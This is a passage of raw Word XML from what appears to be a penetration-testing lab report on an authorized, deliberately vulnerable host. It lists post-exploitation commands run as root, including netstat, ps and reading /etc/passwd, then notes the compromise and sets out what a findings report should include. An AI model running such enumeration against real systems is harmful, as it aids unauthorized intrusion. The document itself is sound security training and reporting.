        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BECB315" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="229F1681" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t>ls -la /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2F1F97" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t>netstat -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>tulpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46DBBDB2" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> aux | head -n 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77092755" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t>cat /etc/passwd | tail -n 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3536E7A2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Key observations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16610028" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve">You are </w:t>
      </w:r>
      <w:r w:rsidRPr="001059B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> — full privilege; attacker can read/write all files and pivot to other hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224FAAE4" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001059B3">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">netstat indicated many services listening (MySQL, Tomcat, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>UnrealIRCd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve">, SMB, VNC, ftp, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>rpcbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655BB4AF" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> showed system processes and service daemons (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>unrealircd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>mysqld</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001059B3">
        <w:t>, apache2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2F7ED6" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve">A root shell on this host constitutes </w:t>
      </w:r>
      <w:r w:rsidRPr="001059B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>full compromise</w:t>
      </w:r>
      <w:r w:rsidRPr="001059B3">
        <w:t xml:space="preserve"> and immediate remediation priority.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B218260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Evidence (screenshots)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F938447" w14:textId="334B08EA" w:rsidR="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001059B3">
        <w:t>screenshots/.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F097551" w14:textId="07AFDBE1" w:rsidR="0039289C" w:rsidRDefault="0039289C" w:rsidP="0039289C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F627501" wp14:editId="0092EAA2">
            <wp:extent cx="4492717" cy="3105977"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="530632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88" cy="310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55A17" wp14:editId="22069B76">
            <wp:extent cx="5184541" cy="3430321"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="728027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78" cy="345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39E0" w14:textId="1EC15D62" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="0039289C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001059B3">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="4EF785B1">
          <v:rect id="_x0000_i1059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="569420E3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5. Reporting — documentation &amp; remediation (completed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBE8E7E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Theory (short)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286D2C13" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:r w:rsidRPr="001059B3">
        <w:t>Reporting packages findings with evidence, impact rating, and prioritized remediation steps for decision makers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F40A67F" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001059B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Completed report items (what to include)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E404EEB" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001059B3">
        <w:t>Executive summary: short, high-level risk statement and key finding (root obtained).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34208615" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001059B3">
        <w:t>Scope &amp; Rules of Engagement: date/time, target IP, authorized lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC49F15" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001059B3">
        <w:t>Methodology: Recon → Scanning → Exploitation → Post-Exploitation → Reporting (tools used).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3817BF19" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001059B3">
        <w:t>Findings (each entry: title, description, evidence, impact, remediation). Example entries below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020AED17" w14:textId="77777777" w:rsidR="001059B3" w:rsidRPr="001059B3" w:rsidRDefault="001059B3" w:rsidP="001059B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001059B3">
        <w:t>Screenshots embedded and referenced with filenames.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14113EBC" w14:textId="77777777" w:rsidR="00283FE0" w:rsidRDefault="00283FE0"/>
    <w:p w14:paraId="4E68079F" w14:textId="77777777" w:rsidR="00283FE0" w:rsidRDefault="00283FE0"/>
    <w:sectPr w:rsidR="00283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C19E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2D94D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672D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8112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904C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3244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71CEF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C3A6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A6F1F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9436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52914"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5ABC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190E93"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ABA4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D0111C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="205E2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EB3274"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="94C27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FA5712"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32AC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912F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A1CF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F723F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C02E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1106CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="66369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3531B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CBC8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977584">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="584533967">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1355771264">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1951232468">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="988561491">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1345091800">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="372920934">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="74715986">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1109399100">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="804928288">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="563220989">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="752241494">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="862012820">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="541863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E0"/>
    <w:rsid w:val="001059B3"/>
    <w:rsid w:val="00283FE0"/>
    <w:rsid w:val="0039289C"/>
    <w:rsid w:val="007646D8"/>
    <w:rsid w:val="00D6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0E065"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9D2D6F3D-2C7D-4B4E-B48B-402BD4158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F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F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F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F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F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F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F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F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F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F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8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bhagyalaxmipanigrahi17@gmail.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>bhagyalaxmipanigrahi17@gmail.com</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-18T05:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-18T18:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>